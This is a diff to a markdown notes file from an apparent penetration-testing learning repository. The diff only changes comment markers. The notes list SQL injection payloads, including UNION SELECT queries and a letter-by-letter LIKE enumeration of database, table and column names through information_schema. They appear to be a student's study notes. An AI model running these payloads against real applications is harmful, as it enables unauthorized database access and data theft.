NischalDaCoder/vapt-learning/notes/VAPT_Notes.md

 		$ username UNION SELECT 1,2,3;-- (finding the path to the actual column)

-		$ username UNION SELECT 1,2,3 where database() like '%';-- (enumeration of the database) --cycle all the keys on the keyboars in the "like" operator such as 'a%' then another time 'b%' until the string matches the first letter of the database name.
+		$ username UNION SELECT 1,2,3 where database() like '%';-- (enumeration of the database) -> cycle all the keys on the keyboars in the "like" operator such as 'a%' then another time 'b%' until the string matches the first letter of the database name.
 After finding the first letter do it until we find the database full 			name.

 		$ username UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'something' and table_name like 'a%';--  (enumeration of table name)
-			-- using infromation_schema database to find the table name just like we found the databse name using "like" operator.
+			-> using infromation_schema database to find the table name just like we found the databse name using "like" operator.

 		$ admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='something' and TABLE_NAME='something' and COLUMN_NAME like 'a%'; (enumerating column name)